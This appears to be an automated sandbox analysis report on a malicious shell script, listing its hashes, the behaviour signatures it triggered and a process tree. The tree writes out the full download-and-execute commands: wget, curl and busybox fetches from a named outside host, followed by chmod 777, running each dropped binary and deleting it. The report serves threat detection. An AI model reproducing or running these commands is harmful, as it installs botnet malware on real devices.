Analysis
-
max time kernel
74s -
max time network
103s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 01:45
Static task
static1
Behavioral task
behavioral1
Sample
585ec47054d0df1fa327009d4f6a78ab7ec3a12a37dab61e9cef078ea9bb8f14.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
585ec47054d0df1fa327009d4f6a78ab7ec3a12a37dab61e9cef078ea9bb8f14.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
585ec47054d0df1fa327009d4f6a78ab7ec3a12a37dab61e9cef078ea9bb8f14.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
585ec47054d0df1fa327009d4f6a78ab7ec3a12a37dab61e9cef078ea9bb8f14.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
585ec47054d0df1fa327009d4f6a78ab7ec3a12a37dab61e9cef078ea9bb8f14.sh
-
Size
10KB
-
MD5
e0055200def5fe48ba452522862fb712
-
SHA1
bf3781538ff791585c1d0eeb9df035f072f3ed54
-
SHA256
585ec47054d0df1fa327009d4f6a78ab7ec3a12a37dab61e9cef078ea9bb8f14
-
SHA512
0a89d5b349924086f77fe4930ad881c0ddcf5375dd5db5c81b1d798afc0331cd20644453475991f75036346f3fc69ed84474662935d60c0d22262aebdd9e996b
-
SSDEEP
192:QpRUAsXNs1yeJwIYzVj8g0e4qS5FyeJwIhg0e4qSzupRUAsX8:QpRUDXNs1yeJwIYzVj8g0BqS5FyeJwI2
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 967 chmod 988 chmod 890 chmod 883 chmod 946 chmod 981 chmod 741 chmod 802 chmod 932 chmod 1009 chmod 897 chmod 918 chmod 756 chmod 911 chmod 960 chmod 953 chmod 995 chmod 777 chmod 876 chmod 869 chmod 925 chmod 1002 chmod 822 chmod 829 chmod 939 chmod 974 chmod 749 chmod 904 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a 742 abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a /tmp/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux 750 MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux /tmp/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC 757 xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC /tmp/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e 778 mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e /tmp/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp 804 XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp /tmp/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg 823 OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg /tmp/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq 830 TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq /tmp/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z 870 LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z /tmp/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 877 thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 /tmp/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA 884 bUV3un6NWptZDauv3O6MxhnE386jPFrhdA /tmp/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq 891 CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq /tmp/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT 898 tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT /tmp/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz 905 viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz /tmp/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE 912 WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE /tmp/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq 919 TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq /tmp/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z 926 LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z /tmp/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp 933 XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp /tmp/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg 940 OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg /tmp/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz 947 viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz /tmp/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE 954 WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE /tmp/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 961 thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 /tmp/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA 968 bUV3un6NWptZDauv3O6MxhnE386jPFrhdA /tmp/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq 975 CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq /tmp/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT 982 tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT /tmp/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a 989 abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a /tmp/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e 996 mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e /tmp/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux 1003 MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux /tmp/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC 1010 xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 746 curl 894 curl 917 busybox 987 busybox 998 wget 783 wget 715 wget 737 busybox 889 busybox 896 busybox 929 curl 938 busybox 1008 busybox 748 busybox 755 busybox 949 wget 952 busybox 984 wget 901 curl 903 busybox 964 curl 971 curl 985 curl 1005 wget 799 busybox 815 curl 879 wget 893 wget 936 curl 992 curl 908 curl 942 wget 945 busybox 963 wget 825 wget 832 wget 833 curl 880 curl 882 busybox 907 wget 910 busybox 922 curl 943 curl 956 wget 978 curl 1001 busybox 873 curl 900 wget 914 wget 950 curl 959 busybox 759 wget 764 curl 821 busybox 826 curl 921 wget 924 busybox 970 wget 977 wget 980 busybox 999 curl 1006 curl 753 curl 791 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e curl File opened for modification /tmp/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq curl File opened for modification /tmp/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE curl File opened for modification /tmp/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e curl File opened for modification /tmp/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA curl File opened for modification /tmp/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC curl File opened for modification /tmp/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC curl File opened for modification /tmp/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg curl File opened for modification /tmp/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA curl File opened for modification /tmp/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 curl File opened for modification /tmp/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq curl File opened for modification /tmp/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z curl File opened for modification /tmp/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp curl File opened for modification /tmp/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 curl File opened for modification /tmp/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a curl File opened for modification /tmp/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a curl File opened for modification /tmp/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux curl File opened for modification /tmp/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp curl File opened for modification /tmp/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT curl File opened for modification /tmp/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE curl File opened for modification /tmp/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT curl File opened for modification /tmp/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg curl File opened for modification /tmp/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz curl File opened for modification /tmp/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq curl File opened for modification /tmp/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq curl File opened for modification /tmp/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z curl File opened for modification /tmp/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz curl File opened for modification /tmp/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux curl
Processes
-
/tmp/585ec47054d0df1fa327009d4f6a78ab7ec3a12a37dab61e9cef078ea9bb8f14.sh/tmp/585ec47054d0df1fa327009d4f6a78ab7ec3a12a37dab61e9cef078ea9bb8f14.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵
- System Network Configuration Discovery
PID:715
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵
- System Network Configuration Discovery
PID:737
-
-
/bin/chmodchmod 777 abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a./abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a2⤵PID:744
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵PID:745
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux./MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux2⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵
- System Network Configuration Discovery
PID:755
-
-
/bin/chmodchmod 777 xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC./xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵
- Executes dropped EXE
PID:757
-
-
/bin/rmrm xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC2⤵PID:758
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵
- System Network Configuration Discovery
PID:759
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵PID:772
-
-
/bin/chmodchmod 777 mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e./mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵
- Executes dropped EXE
PID:778
-
-
/bin/rmrm mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e2⤵PID:781
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵
- System Network Configuration Discovery
PID:783
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵
- System Network Configuration Discovery
PID:799
-
-
/bin/chmodchmod 777 XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp./XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵
- Executes dropped EXE
PID:804
-
-
/bin/rmrm XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵PID:810
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵PID:811
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵
- System Network Configuration Discovery
PID:821
-
-
/bin/chmodchmod 777 OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg./OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵PID:824
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵
- System Network Configuration Discovery
PID:825
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵PID:828
-
-
/bin/chmodchmod 777 TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq./TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵PID:831
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵
- System Network Configuration Discovery
PID:832
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵PID:835
-
-
/bin/chmodchmod 777 LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z./LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵PID:871
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵PID:872
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵PID:875
-
-
/bin/chmodchmod 777 thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3./thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P32⤵PID:878
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA./bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm bUV3un6NWptZDauv3O6MxhnE386jPFrhdA2⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq./CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq2⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT./tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵
- System Network Configuration Discovery
PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz./viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵
- System Network Configuration Discovery
PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE./WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE2⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵
- System Network Configuration Discovery
PID:917
-
-
/bin/chmodchmod 777 TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq./TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵
- System Network Configuration Discovery
PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵
- System Network Configuration Discovery
PID:924
-
-
/bin/chmodchmod 777 LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z./LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z2⤵PID:927
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵PID:928
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵PID:931
-
-
/bin/chmodchmod 777 XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp./XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp2⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵
- System Network Configuration Discovery
PID:938
-
-
/bin/chmodchmod 777 OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg./OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg2⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz2⤵
- File and Directory Permissions Modification
PID:946
-
